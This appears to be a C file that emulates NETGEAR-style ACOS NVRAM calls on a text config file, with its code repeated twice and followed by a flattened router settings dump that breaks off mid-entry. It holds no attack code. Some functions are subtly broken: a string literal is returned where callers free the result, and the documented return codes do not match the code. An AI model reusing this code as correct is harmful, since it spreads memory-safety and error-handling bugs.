*trimmed_line = line; while (isspace((unsigned char)*trimmed_line)) { trimmed_line++; } // 跳过空行(只有空白字符的行) if (*trimmed_line == '\0') { continue; } // 解析 key=value 格式 if (sscanf(trimmed_line, "%63[^=]=%127[^\n]", config_key, config_value) == 2) { // 去除键名可能的尾部空白 char *trimmed_key = config_key + strlen(config_key) - 1; while (trimmed_key > config_key && isspace((unsigned char)*trimmed_key)) { *trimmed_key = '\0'; trimmed_key--; } // 去除键值可能的首部空白 char *trimmed_value = config_value; while (isspace((unsigned char)*trimmed_value)) { trimmed_value++; } // 去除键值可能的尾部空白 char *end_value = trimmed_value + strlen(trimmed_value) - 1; while (end_value > trimmed_value && isspace((unsigned char)*end_value)) { *end_value = '\0'; end_value--; } // 检查是否匹配请求的键 if (strcmp(config_key, key) == 0) { // 分配内存并复制值 result = malloc(strlen(trimmed_value) + 1); if (result) { strcpy(result, trimmed_value); found = 1; } else { fprintf(stderr, "Error: Memory allocation failed\n"); } break; // 找到配置项,退出循环 } } } fclose(fp); if (!found) { // 不打印警告,让调用者决定是否记录 return NULL; } return result;}/** * @brief 从配置文件中获取指定键的值(不使用动态分配) * @param key 要查找的键名 * @param buffer 存储结果的缓冲区 * @param buffer_size 缓冲区大小 * @return 成功返回缓冲区指针,失败返回NULL */char *nvm_get_value_no_alloc(const char *key, char *buffer, size_t buffer_size){ FILE *fp; char line[MAX_LINE_LENGTH]; char config_key[MAX_KEY_LENGTH]; char config_value[MAX_VALUE_LENGTH]; int found = 0; // 参数检查 if (!key || strlen(key) == 0 || !buffer || buffer_size == 0) { fprintf(stderr, "Error: Invalid parameters\n"); return NULL; } // 初始化缓冲区 buffer[0] = '\0'; // 打开配置文件 fp = fopen(ROUTE_CONFIG_PATH, "r"); if (fp == NULL) { return NULL; } // 逐行读取配置文件 while (fgets(line, sizeof(line), fp) != NULL) { // 移除换行符 line[strcspn(line, "\n")] = '\0'; // 跳过空行和注释 if (line[0] == '\0' || line[0] == '#') { continue; } // 移除行首空白字符 char *trimmed_line = line; while (isspace((unsigned char)*trimmed_line)) { trimmed_line++; } // 跳过空行(只有空白字符的行) if (*trimmed_line == '\0') { continue; } // 解析 key=value 格式 if (sscanf(trimmed_line, "%63[^=]=%127[^\n]", config_key, config_value) == 2) { // 去除键名可能的尾部空白 char *trimmed_key = config_key + strlen(config_key) - 1; while (trimmed_key > config_key && isspace((unsigned char)*trimmed_key)) { *trimmed_key = '\0'; trimmed_key--; } // 去除键值可能的首部空白 char *trimmed_value = config_value; while (isspace((unsigned char)*trimmed_value)) { trimmed_value++; } // 去除键值可能的尾部空白 char *end_value = trimmed_value + strlen(trimmed_value) - 1; while (end_value > trimmed_value && isspace((unsigned char)*end_value)) { *end_value = '\0'; end_value--; } // 检查是否匹配请求的键 if (strcmp(config_key, key) == 0) { // 复制值到缓冲区 strncpy(buffer, trimmed_value, buffer_size - 1); buffer[buffer_size - 1] = '\0'; found = 1; break; // 找到配置项,退出循环 } } } fclose(fp); if (!found) { return NULL; } return buffer;}/** * @brief 设置NVRAM配置,如果key存在则修改,不存在则添加 * @param key 配置键名 * @param value 配置值 * @return 0成功,-1失败 */int acosNvramConfig_set(const char *key, const char *value){ FILE *fp_read, *fp_write; char line[MAX_LINE_LENGTH]; char config_key[MAX_KEY_LENGTH]; char config_value[MAX_VALUE_LENGTH]; char temp_file[] = "/tmp/route.cfg.tmp"; int found = 0; int result = 0; // 参数检查 if (!key || strlen(key) == 0 || !value) { fprintf(stderr, "Error: Invalid key or value parameter\n"); return 1; } // 验证key不包含等号或换行符 if (strchr(key, '=') != NULL || strchr(key, '\n') != NULL) { fprintf(stderr, "Error: Key contains invalid characters\n"); return 1; } // 验证value不包含换行符 if (strchr(value, '\n') != NULL) { fprintf(stderr, "Error: Value contains newline character\n"); return 1; } // 打开原配置文件用于读取 fp_read = fopen(ROUTE_CONFIG_PATH, "r"); // 创建临时文件用于写入 fp_write = fopen(temp_file, "w"); if (fp_write == NULL) { fprintf(stderr, "Error: Cannot create temp file: %s\n", strerror(errno)); if (fp_read) fclose(fp_read); return 1; } // 如果原文件存在,逐行处理 if (fp_read != NULL) { while (fgets(line, sizeof(line), fp_read) != NULL) { char *trimmed_line = line; bool is_comment_or_empty = false; // 移除换行符 line[strcspn(line, "\n")] = '\0'; // 跳过空行和注释行(以#开头) if (line[0] == '\0' || line[0] == '#') { is_comment_or_empty = true; } // 移除行首空白字符 while (isspace((unsigned char)*trimmed_line)) { trimmed_line++; } // 跳过只有空白字符的行 if (*trimmed_line == '\0') { is_comment_or_empty = true; } // 如果是注释或空行,直接写入临时文件 if (is_comment_or_empty) { fprintf(fp_write, "%s\n", line); continue; } // 解析 key=value 格式 if (sscanf(trimmed_line, "%63[^=]=%127[^\n]", config_key, config_value) >= 1) { // 去除键名可能的尾部空白 char *trimmed_key = config_key + strlen(config_key) - 1; while (trimmed_key > config_key && isspace((unsigned char)*trimmed_key)) { *trimmed_key = '\0'; trimmed_key--; } // 检查是否匹配请求的键 // fprintf(stderr,"%s=%s\n", config_key, key); if (strcmp(config_key, key) == 0) { // 找到匹配的键,写入新的值 fprintf(fp_write, "%s=%s\n", key, value); found = 1; } else { // 不是我们要修改的键,原样写入 fprintf(fp_write, "%s\n", line); } } else { // 格式错误的行,原样写入 fprintf(fp_write, "%s\n", line); } } fclose(fp_read); } // 如果没找到键,在文件末尾添加 if (!found) { fprintf(fp_write, "%s=%s\n", key, value); } // 关闭临时文件 fclose(fp_write); // 用临时文件替换原文件 if (rename(temp_file, ROUTE_CONFIG_PATH) != 0) { fprintf(stderr, "Error: Cannot replace config file: %s\n", strerror(errno)); // 尝试删除临时文件 remove(temp_file); result = 1; } printf("[DEBUG] Setting config: %s = %s\n", key, value); return result;}/** * @brief 从配置文件读取配置值 * @param key 要获取的配置项键名 * @return 配置值的字符串指针(动态分配,调用者需释放),失败返回NULL */char *acosNvramConfig_get(const char *key){ char *result = NULL; // 参数检查 if (!key || strlen(key) == 0) { fprintf(stderr, "Error: Invalid key parameter\n"); return NULL; } result = nvm_get_value(key); // 检查是否获取到有效值 if (result) { printf("[DEBUG] Getting config: %s = %s\n", key, result); } else { result = ""; printf("[DEBUG] Config not found: %s\n", key); } return result;}/** * @brief 检查配置值是否匹配给定值 * @param key 配置键名 * @param value 要匹配的值 * @return true匹配,false不匹配 */bool acosNvramConfig_match(const char *key, const char *value){ bool result = false; char *config_value = nvm_get_value(key); if (config_value && value) { result = (strcmp(config_value, value) == 0); } printf("[DEBUG] Match config: %s = %s, result: %s\n", key, value, result ? "true" : "false"); if (config_value) { free(config_value); } return result;}/** * @brief 检查配置值是否不匹配给定值 * @param key 配置键名 * @param value 要比较的值 * @return true不匹配,false匹配 */bool acosNvramConfig_invmatch(const char *key, const char *value){ bool result = false; char *config_value = nvm_get_value(key); if (config_value && value) { result = (strcmp(config_value, value) != 0); } else if (!config_value && value) { // 配置不存在,与任何值都不匹配 result = true; } printf("[DEBUG] Invmatch config: %s = %s, result: %s\n", key, value, result ? "true" : "false"); if (config_value) { free(config_value); } return result;}/** * @brief 读取配置值到提供的缓冲区 * @param key 配置键名 * @param value 存储配置值的缓冲区 * @param size 缓冲区大小 * @return 0成功,-1失败 */int acosNvramConfig_read(const char *key, char *value, int size){ // 参数检查 if (!key || !value || size <= 0) { fprintf(stderr, "Error: Invalid parameters\n"); return 1; } // 清空缓冲区 value[0] = '\0'; // 获取配置值 if (nvm_get_value_no_alloc(key, value, size) == NULL) { value = ""; printf("[DEBUG] Read config failed: %s\n", key); return 1; } printf("[DEBUG] Read config: %s = %s\n", key, value); return 0;}/** * @brief 将配置值读取为整数 * @param key 配置键名 * @param value 存储整数值的指针 * @param default_value 读取失败时的默认值 * @return 0成功,-1失败 */int acosNvramConfig_readAsInt(const char *key, int *value, int default_value){ char buffer[32]; char *endptr; // 参数检查 if (!key || !value) { fprintf(stderr, "Error: Invalid parameters\n"); return 1; } // 设置默认值 *value = default_value; // 获取配置值 if (nvm_get_value_no_alloc(key, buffer, sizeof(buffer)) == NULL) { printf("[DEBUG] ReadAsInt config not found: %s, using default: %d\n", key, default_value); return 1; } // 转换为整数 long int_val = strtol(buffer, &endptr, 10); if (*endptr == '\0') { *value = (int)int_val; printf("[DEBUG] ReadAsInt config: %s = %d\n", key, *value); return 0; } else { printf("[DEBUG] ReadAsInt config invalid format: %s = %s, using default: %d\n", key, buffer, default_value); return 1; }}/** * @brief 检查并设置配置值(如果不存在则设置) * @param key 配置键名 * @param value 配置值 * @return 0成功,-1失败 */int acosNvramConfig_check_set(const char *key, const char *value){ // 检查配置是否存在 char *current_value = nvm_get_value(key); if (current_value == NULL) { // 配置不存在,设置新值 printf("[DEBUG] CheckSet: %s not exists, setting to: %s\n", key, value); free(current_value); return acosNvramConfig_set(key, value); } else { printf("[DEBUG] CheckSet: %s already exists = %s\n", key, current_value); free(current_value); return 0; // 已存在,返回成功 }}/** * @brief 保存配置文件(确保写入磁盘) * @return 0成功,-1失败 */int acosNvramConfig_save(void){ // 由于我们使用文件系统,通常不需要特别的保存操作 // 但我们可以调用sync()或fsync()来确保数据写入磁盘 #ifdef __linux__ sync(); #endif printf("[DEBUG] Save config\n"); return 0;}/** * @brief 删除配置项 * @param key 配置键名 * @return 0成功,-1失败 */int acosNvramConfig_unset(const char *key){ FILE *fp_read, *fp_write; char line[MAX_LINE_LENGTH]; char config_key[MAX_KEY_LENGTH]; char config_value[MAX_VALUE_LENGTH]; char temp_file[] = "/tmp/route.cfg.tmp"; int found = 0; int result = 0; // 参数检查 if (!key || strlen(key) == 0) { fprintf(stderr, "Error: Invalid key parameter\n"); return 1; } // 打开原配置文件用于读取 fp_read = fopen(ROUTE_CONFIG_PATH, "r"); if (fp_read == NULL) { // 文件不存在,不需要删除 printf("[DEBUG] Unset config: %s (file not exists)\n", key); return 0; } // 创建临时文件用于写入 fp_write = fopen(temp_file, "w"); if (fp_write == NULL) { fprintf(stderr, "Error: Cannot create temp file: %s\n", strerror(errno)); fclose(fp_read); return 1; } // 逐行读取原文件 while (fgets(line, sizeof(line), fp_read) != NULL) { char *trimmed_line = line; bool is_comment_or_empty = false; // 移除换行符 line[strcspn(line, "\n")] = '\0'; // 跳过空行和注释行(以#开头) if (line[0] == '\0' || line[0] == '#') { is_comment_or_empty = true; } // 移除行首空白字符 while (isspace((unsigned char)*trimmed_line)) { trimmed_line++; } // 跳过只有空白字符的行 if (*trimmed_line == '\0') { is_comment_or_empty = true; } // 如果是注释或空行,直接写入临时文件 if (is_comment_or_empty) { fprintf(fp_write, "%s\n", line); continue; } // 解析 key=value 格式 if (sscanf(trimmed_line, "%63[^=]=%127[^\n]", config_key, config_value) == 2) { // 去除键名可能的尾部空白 char *trimmed_key = config_key + strlen(config_key) - 1; while (trimmed_key > config_key && isspace((unsigned char)*trimmed_key)) { *trimmed_key = '\0'; trimmed_key--; } // 检查是否匹配请求的键 if (strcmp(config_key, key) == 0) { // 找到匹配的键,跳过不写入(即删除) found = 1; continue; } else { // 不是我们要删除的键,原样写入 fprintf(fp_write, "%s\n", line); } } else { // 格式错误的行,原样写入 fprintf(fp_write, "%s\n", line); } } // 关闭文件 fclose(fp_read); fclose(fp_write); // 用临时文件替换原文件 if (rename(temp_file, ROUTE_CONFIG_PATH) != 0) { fprintf(stderr, "Error: Cannot replace config file: %s\n", strerror(errno)); // 尝试删除临时文件 remove(temp_file); result = 1; } printf("[DEBUG] Unset config: %s %s\n", key, found ? "deleted" : "not found"); return result;}/** * @brief 检查配置项是否存在 * @param key 配置键名 * @return true存在,false不存在 */bool acosNvramConfig_exist(const char *key){ char *value = nvm_get_value(key); bool exists = (value != NULL); printf("[DEBUG] Exist config: %s = %s\n", key, exists ? "true" : "false"); if (value) { free(value); } return exists;}/** * @brief 测试函数 */void test_config_functions(void){ printf("=== Testing Config Functions ===\n"); // 测试设置和获取 acosNvramConfig_set("server_ip", "192.168.1.1"); char *ip = acosNvramConfig_get("server_ip"); if (ip) { printf("Got server_ip: %s\n", ip); free(ip); } // 测试修改 acosNvramConfig_set("server_ip", "10.0.0.1"); ip = acosNvramConfig_get("server_ip"); if (ip) { printf("Updated server_ip: %s\n", ip); free(ip); } // 测试匹配 bool matched = acosNvramConfig_match("server_ip", "10.0.0.1"); printf("Match test: %s\n", matched ? "PASS" : "FAIL"); // 测试读取整数 acosNvramConfig_set("port", "8080"); int port; if (acosNvramConfig_readAsInt("port", &port, 80) == 0) { printf("Port: %d\n", port); } // 测试检查并设置 acosNvramConfig_check_set("new_setting", "value123"); // 测试存在性检查 bool exists = acosNvramConfig_exist("new_setting"); printf("new_setting exists: %s\n", exists ? "true" : "false"); // 测试删除 acosNvramConfig_unset("new_setting"); exists = acosNvramConfig_exist("new_setting"); printf("new_setting after unset exists: %s\n", exists ? "true" : "false"); printf("=== Test Complete ===\n");}/** * @brief 主函数(测试用) */int main(int argc, char *argv[]){ // 如果带参数"-test",运行测试 if (argc > 1 && strcmp(argv[1], "-test") == 0) { test_config_functions(); return 0; } // 简单演示 printf("Config Management System\n"); printf("Config file: %s\n", ROUTE_CONFIG_PATH); // 示例:设置和获取配置 acosNvramConfig_set("test_key", "test_value"); char *value = acosNvramConfig_get("test_key"); if (value) { printf("test_key = %s\n", value); free(value); } return 0;}#include <stdio.h>#include <stdlib.h>#include <string.h>#include <ctype.h>#include <stdbool.h>#include <errno.h>// 假设配置文件路径#define ROUTE_CONFIG_PATH "/tmp/route.cfg"#define MAX_LINE_LENGTH 256#define MAX_KEY_LENGTH 64#define MAX_VALUE_LENGTH 128// 函数声明char *nvm_get_value(const char *key);char *nvm_get_value_no_alloc(const char *key, char *buffer, size_t buffer_size);/** * @brief 从配置文件中获取指定键的值(动态分配内存) * @param key 要查找的键名 * @return 成功返回动态分配的字符串(需要调用者释放),失败返回NULL */char *nvm_get_value(const char *key){ FILE *fp; char line[MAX_LINE_LENGTH]; char config_key[MAX_KEY_LENGTH]; char config_value[MAX_VALUE_LENGTH]; char *result = NULL; int found = 0; // 参数检查 if (!key || strlen(key) == 0) { fprintf(stderr, "Error: Invalid key parameter\n"); return NULL; } // 打开配置文件 fp = fopen(ROUTE_CONFIG_PATH, "r"); if (fp == NULL) { fprintf(stderr, "Error: Cannot open config file %s: %s\n", ROUTE_CONFIG_PATH, strerror(errno)); return NULL; } // 逐行读取配置文件 while (fgets(line, sizeof(line), fp) != NULL) { // 移除换行符 line[strcspn(line, "\n")] = '\0'; // 跳过空行和注释 if (line[0] == '\0' || line[0] == '#') { continue; } // 移除行首空白字符 char *trimmed_line = line; while (isspace((unsigned char)*trimmed_line)) { trimmed_line++; } // 跳过空行(只有空白字符的行) if (*trimmed_line == '\0') { continue; } // 解析 key=value 格式 if (sscanf(trimmed_line, "%63[^=]=%127[^\n]", config_key, config_value) == 2) { // 去除键名可能的尾部空白 char *trimmed_key = config_key + strlen(config_key) - 1; while (trimmed_key > config_key && isspace((unsigned char)*trimmed_key)) { *trimmed_key = '\0'; trimmed_key--; } // 去除键值可能的首部空白 char *trimmed_value = config_value; while (isspace((unsigned char)*trimmed_value)) { trimmed_value++; } // 去除键值可能的尾部空白 char *end_value = trimmed_value + strlen(trimmed_value) - 1; while (end_value > trimmed_value && isspace((unsigned char)*end_value)) { *end_value = '\0'; end_value--; } // 检查是否匹配请求的键 if (strcmp(config_key, key) == 0) { // 分配内存并复制值 result = malloc(strlen(trimmed_value) + 1); if (result) { strcpy(result, trimmed_value); found = 1; } else { fprintf(stderr, "Error: Memory allocation failed\n"); } break; // 找到配置项,退出循环 } } } fclose(fp); if (!found) { // 不打印警告,让调用者决定是否记录 return NULL; } return result;}/** * @brief 从配置文件中获取指定键的值(不使用动态分配) * @param key 要查找的键名 * @param buffer 存储结果的缓冲区 * @param buffer_size 缓冲区大小 * @return 成功返回缓冲区指针,失败返回NULL */char *nvm_get_value_no_alloc(const char *key, char *buffer, size_t buffer_size){ FILE *fp; char line[MAX_LINE_LENGTH]; char config_key[MAX_KEY_LENGTH]; char config_value[MAX_VALUE_LENGTH]; int found = 0; // 参数检查 if (!key || strlen(key) == 0 || !buffer || buffer_size == 0) { fprintf(stderr, "Error: Invalid parameters\n"); return NULL; } // 初始化缓冲区 buffer[0] = '\0'; // 打开配置文件 fp = fopen(ROUTE_CONFIG_PATH, "r"); if (fp == NULL) { return NULL; } // 逐行读取配置文件 while (fgets(line, sizeof(line), fp) != NULL) { // 移除换行符 line[strcspn(line, "\n")] = '\0'; // 跳过空行和注释 if (line[0] == '\0' || line[0] == '#') { continue; } // 移除行首空白字符 char *trimmed_line = line; while (isspace((unsigned char)*trimmed_line)) { trimmed_line++; } // 跳过空行(只有空白字符的行) if (*trimmed_line == '\0') { continue; } // 解析 key=value 格式 if (sscanf(trimmed_line, "%63[^=]=%127[^\n]", config_key, config_value) == 2) { // 去除键名可能的尾部空白 char *trimmed_key = config_key + strlen(config_key) - 1; while (trimmed_key > config_key && isspace((unsigned char)*trimmed_key)) { *trimmed_key = '\0'; trimmed_key--; } // 去除键值可能的首部空白 char *trimmed_value = config_value; while (isspace((unsigned char)*trimmed_value)) { trimmed_value++; } // 去除键值可能的尾部空白 char *end_value = trimmed_value + strlen(trimmed_value) - 1; while (end_value > trimmed_value && isspace((unsigned char)*end_value)) { *end_value = '\0'; end_value--; } // 检查是否匹配请求的键 if (strcmp(config_key, key) == 0) { // 复制值到缓冲区 strncpy(buffer, trimmed_value, buffer_size - 1); buffer[buffer_size - 1] = '\0'; found = 1; break; // 找到配置项,退出循环 } } } fclose(fp); if (!found) { return NULL; } return buffer;}/** * @brief 设置NVRAM配置,如果key存在则修改,不存在则添加 * @param key 配置键名 * @param value 配置值 * @return 0成功,-1失败 */int acosNvramConfig_set(const char *key, const char *value){ FILE *fp_read, *fp_write; char line[MAX_LINE_LENGTH]; char config_key[MAX_KEY_LENGTH]; char config_value[MAX_VALUE_LENGTH]; char temp_file[] = "/tmp/route.cfg.tmp"; int found = 0; int result = 0; // 参数检查 if (!key || strlen(key) == 0 || !value) { fprintf(stderr, "Error: Invalid key or value parameter\n"); return 1; } // 验证key不包含等号或换行符 if (strchr(key, '=') != NULL || strchr(key, '\n') != NULL) { fprintf(stderr, "Error: Key contains invalid characters\n"); return 1; } // 验证value不包含换行符 if (strchr(value, '\n') != NULL) { fprintf(stderr, "Error: Value contains newline character\n"); return 1; } // 打开原配置文件用于读取 fp_read = fopen(ROUTE_CONFIG_PATH, "r"); // 创建临时文件用于写入 fp_write = fopen(temp_file, "w"); if (fp_write == NULL) { fprintf(stderr, "Error: Cannot create temp file: %s\n", strerror(errno)); if (fp_read) fclose(fp_read); return 1; } // 如果原文件存在,逐行处理 if (fp_read != NULL) { while (fgets(line, sizeof(line), fp_read) != NULL) { char *trimmed_line = line; bool is_comment_or_empty = false; // 移除换行符 line[strcspn(line, "\n")] = '\0'; // 跳过空行和注释行(以#开头) if (line[0] == '\0' || line[0] == '#') { is_comment_or_empty = true; } // 移除行首空白字符 while (isspace((unsigned char)*trimmed_line)) { trimmed_line++; } // 跳过只有空白字符的行 if (*trimmed_line == '\0') { is_comment_or_empty = true; } // 如果是注释或空行,直接写入临时文件 if (is_comment_or_empty) { fprintf(fp_write, "%s\n", line); continue; } // 解析 key=value 格式 if (sscanf(trimmed_line, "%63[^=]=%127[^\n]", config_key, config_value) >= 1) { // 去除键名可能的尾部空白 char *trimmed_key = config_key + strlen(config_key) - 1; while (trimmed_key > config_key && isspace((unsigned char)*trimmed_key)) { *trimmed_key = '\0'; trimmed_key--; } // 检查是否匹配请求的键 // fprintf(stderr,"%s=%s\n", config_key, key); if (strcmp(config_key, key) == 0) { // 找到匹配的键,写入新的值 fprintf(fp_write, "%s=%s\n", key, value); found = 1; } else { // 不是我们要修改的键,原样写入 fprintf(fp_write, "%s\n", line); } } else { // 格式错误的行,原样写入 fprintf(fp_write, "%s\n", line); } } fclose(fp_read); } // 如果没找到键,在文件末尾添加 if (!found) { fprintf(fp_write, "%s=%s\n", key, value); } // 关闭临时文件 fclose(fp_write); // 用临时文件替换原文件 if (rename(temp_file, ROUTE_CONFIG_PATH) != 0) { fprintf(stderr, "Error: Cannot replace config file: %s\n", strerror(errno)); // 尝试删除临时文件 remove(temp_file); result = 1; } printf("[DEBUG] Setting config: %s = %s\n", key, value); return result;}/** * @brief 从配置文件读取配置值 * @param key 要获取的配置项键名 * @return 配置值的字符串指针(动态分配,调用者需释放),失败返回NULL */char *acosNvramConfig_get(const char *key){ char *result = NULL; // 参数检查 if (!key || strlen(key) == 0) { fprintf(stderr, "Error: Invalid key parameter\n"); return NULL; } result = nvm_get_value(key); // 检查是否获取到有效值 if (result) { printf("[DEBUG] Getting config: %s = %s\n", key, result); } else { result = ""; printf("[DEBUG] Config not found: %s\n", key); } return result;}/** * @brief 检查配置值是否匹配给定值 * @param key 配置键名 * @param value 要匹配的值 * @return true匹配,false不匹配 */bool acosNvramConfig_match(const char *key, const char *value){ bool result = false; char *config_value = nvm_get_value(key); if (config_value && value) { result = (strcmp(config_value, value) == 0); } printf("[DEBUG] Match config: %s = %s, result: %s\n", key, value, result ? "true" : "false"); if (config_value) { free(config_value); } return result;}/** * @brief 检查配置值是否不匹配给定值 * @param key 配置键名 * @param value 要比较的值 * @return true不匹配,false匹配 */bool acosNvramConfig_invmatch(const char *key, const char *value){ bool result = false; char *config_value = nvm_get_value(key); if (config_value && value) { result = (strcmp(config_value, value) != 0); } else if (!config_value && value) { // 配置不存在,与任何值都不匹配 result = true; } printf("[DEBUG] Invmatch config: %s = %s, result: %s\n", key, value, result ? "true" : "false"); if (config_value) { free(config_value); } return result;}/** * @brief 读取配置值到提供的缓冲区 * @param key 配置键名 * @param value 存储配置值的缓冲区 * @param size 缓冲区大小 * @return 0成功,-1失败 */int acosNvramConfig_read(const char *key, char *value, int size){ // 参数检查 if (!key || !value || size <= 0) { fprintf(stderr, "Error: Invalid parameters\n"); return 1; } // 清空缓冲区 value[0] = '\0'; // 获取配置值 if (nvm_get_value_no_alloc(key, value, size) == NULL) { value = ""; printf("[DEBUG] Read config failed: %s\n", key); return 1; } printf("[DEBUG] Read config: %s = %s\n", key, value); return 0;}/** * @brief 将配置值读取为整数 * @param key 配置键名 * @param value 存储整数值的指针 * @param default_value 读取失败时的默认值 * @return 0成功,-1失败 */int acosNvramConfig_readAsInt(const char *key, int *value, int default_value){ char buffer[32]; char *endptr; // 参数检查 if (!key || !value) { fprintf(stderr, "Error: Invalid parameters\n"); return 1; } // 设置默认值 *value = default_value; // 获取配置值 if (nvm_get_value_no_alloc(key, buffer, sizeof(buffer)) == NULL) { printf("[DEBUG] ReadAsInt config not found: %s, using default: %d\n", key, default_value); return 1; } // 转换为整数 long int_val = strtol(buffer, &endptr, 10); if (*endptr == '\0') { *value = (int)int_val; printf("[DEBUG] ReadAsInt config: %s = %d\n", key, *value); return 0; } else { printf("[DEBUG] ReadAsInt config invalid format: %s = %s, using default: %d\n", key, buffer, default_value); return 1; }}/** * @brief 检查并设置配置值(如果不存在则设置) * @param key 配置键名 * @param value 配置值 * @return 0成功,-1失败 */int acosNvramConfig_check_set(const char *key, const char *value){ // 检查配置是否存在 char *current_value = nvm_get_value(key); if (current_value == NULL) { // 配置不存在,设置新值 printf("[DEBUG] CheckSet: %s not exists, setting to: %s\n", key, value); free(current_value); return acosNvramConfig_set(key, value); } else { printf("[DEBUG] CheckSet: %s already exists = %s\n", key, current_value); free(current_value); return 0; // 已存在,返回成功 }}/** * @brief 保存配置文件(确保写入磁盘) * @return 0成功,-1失败 */int acosNvramConfig_save(void){ // 由于我们使用文件系统,通常不需要特别的保存操作 // 但我们可以调用sync()或fsync()来确保数据写入磁盘 #ifdef __linux__ sync(); #endif printf("[DEBUG] Save config\n"); return 0;}/** * @brief 删除配置项 * @param key 配置键名 * @return 0成功,-1失败 */int acosNvramConfig_unset(const char *key){ FILE *fp_read, *fp_write; char line[MAX_LINE_LENGTH]; char config_key[MAX_KEY_LENGTH]; char config_value[MAX_VALUE_LENGTH]; char temp_file[] = "/tmp/route.cfg.tmp"; int found = 0; int result = 0; // 参数检查 if (!key || strlen(key) == 0) { fprintf(stderr, "Error: Invalid key parameter\n"); return 1; } // 打开原配置文件用于读取 fp_read = fopen(ROUTE_CONFIG_PATH, "r"); if (fp_read == NULL) { // 文件不存在,不需要删除 printf("[DEBUG] Unset config: %s (file not exists)\n", key); return 0; } // 创建临时文件用于写入 fp_write = fopen(temp_file, "w"); if (fp_write == NULL) { fprintf(stderr, "Error: Cannot create temp file: %s\n", strerror(errno)); fclose(fp_read); return 1; } // 逐行读取原文件 while (fgets(line, sizeof(line), fp_read) != NULL) { char *trimmed_line = line; bool is_comment_or_empty = false; // 移除换行符 line[strcspn(line, "\n")] = '\0'; // 跳过空行和注释行(以#开头) if (line[0] == '\0' || line[0] == '#') { is_comment_or_empty = true; } // 移除行首空白字符 while (isspace((unsigned char)*trimmed_line)) { trimmed_line++; } // 跳过只有空白字符的行 if (*trimmed_line == '\0') { is_comment_or_empty = true; } // 如果是注释或空行,直接写入临时文件 if (is_comment_or_empty) { fprintf(fp_write, "%s\n", line); continue; } // 解析 key=value 格式 if (sscanf(trimmed_line, "%63[^=]=%127[^\n]", config_key, config_value) == 2) { // 去除键名可能的尾部空白 char *trimmed_key = config_key + strlen(config_key) - 1; while (trimmed_key > config_key && isspace((unsigned char)*trimmed_key)) { *trimmed_key = '\0'; trimmed_key--; } // 检查是否匹配请求的键 if (strcmp(config_key, key) == 0) { // 找到匹配的键,跳过不写入(即删除) found = 1; continue; } else { // 不是我们要删除的键,原样写入 fprintf(fp_write, "%s\n", line); } } else { // 格式错误的行,原样写入 fprintf(fp_write, "%s\n", line); } } // 关闭文件 fclose(fp_read); fclose(fp_write); // 用临时文件替换原文件 if (rename(temp_file, ROUTE_CONFIG_PATH) != 0) { fprintf(stderr, "Error: Cannot replace config file: %s\n", strerror(errno)); // 尝试删除临时文件 remove(temp_file); result = 1; } printf("[DEBUG] Unset config: %s %s\n", key, found ? "deleted" : "not found"); return result;}/** * @brief 检查配置项是否存在 * @param key 配置键名 * @return true存在,false不存在 */bool acosNvramConfig_exist(const char *key){ char *value = nvm_get_value(key); bool exists = (value != NULL); printf("[DEBUG] Exist config: %s = %s\n", key, exists ? "true" : "false"); if (value) { free(value); } return exists;}/** * @brief 测试函数 */void test_config_functions(void){ printf("=== Testing Config Functions ===\n"); // 测试设置和获取 acosNvramConfig_set("server_ip", "192.168.1.1"); char *ip = acosNvramConfig_get("server_ip"); if (ip) { printf("Got server_ip: %s\n", ip); free(ip); } // 测试修改 acosNvramConfig_set("server_ip", "10.0.0.1"); ip = acosNvramConfig_get("server_ip"); if (ip) { printf("Updated server_ip: %s\n", ip); free(ip); } // 测试匹配 bool matched = acosNvramConfig_match("server_ip", "10.0.0.1"); printf("Match test: %s\n", matched ? "PASS" : "FAIL"); // 测试读取整数 acosNvramConfig_set("port", "8080"); int port; if (acosNvramConfig_readAsInt("port", &port, 80) == 0) { printf("Port: %d\n", port); } // 测试检查并设置 acosNvramConfig_check_set("new_setting", "value123"); // 测试存在性检查 bool exists = acosNvramConfig_exist("new_setting"); printf("new_setting exists: %s\n", exists ? "true" : "false"); // 测试删除 acosNvramConfig_unset("new_setting"); exists = acosNvramConfig_exist("new_setting"); printf("new_setting after unset exists: %s\n", exists ? "true" : "false"); printf("=== Test Complete ===\n");}/** * @brief 主函数(测试用) */int main(int argc, char *argv[]){ // 如果带参数"-test",运行测试 if (argc > 1 && strcmp(argv[1], "-test") == 0) { test_config_functions(); return 0; } // 简单演示 printf("Config Management System\n"); printf("Config file: %s\n", ROUTE_CONFIG_PATH); // 示例:设置和获取配置 acosNvramConfig_set("test_key", "test_value"); char *value = acosNvramConfig_get("test_key"); if (value) { printf("test_key = %s\n", value); free(value); } return 0;}fw_spi=1usb_info_dev7=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@http_server_wan_enable=0wifi_mac12=62:c0:02:11:22:33wan_fix_dns=0wifi_wep_on12=0usb_info_dev83=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@wifi_auth_type3=3wan_iptype=Dynamicusb_info_dev8=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@usb_info_dev63=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@wifi_ssid4=NETGEAR_Guest3usb_info_dev53=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@usb_info_dev16=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@wan_vci_change=0usb_info_dev37=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@interface=wan1,wan2,wan3,wan4,wan5,wan6,wan7,wan8,vlan1,vlan2,vlan3,vlan4,ssid1,ssid2,ssid3,ssid4,PhonePort(1&2)usb_info_dev70=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@wiz_language=Englishusb_info_dev67=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@wl0_channel=0usb_info_dev32=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@port_trigger_dis=0wifi_def_key2=1usb_info_dev11=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@wifi_if_on12=0usb_info_dev6=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@usb_info_dev28=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@wifi_def_key14=1lan_ipaddr=192.168.1.1upnp_enable=1fw_response_ping=0wan_dod=1usb_info_dev79=A200396E0402FF83@1@14.4G@U@1@USB_Storage;U:;0;0@wifi_wep_on13=0mail_block=1wifi_ssid1=NETGEAR-5Gusb_info_dev68=A200396E0402FF83@1@14.4G@U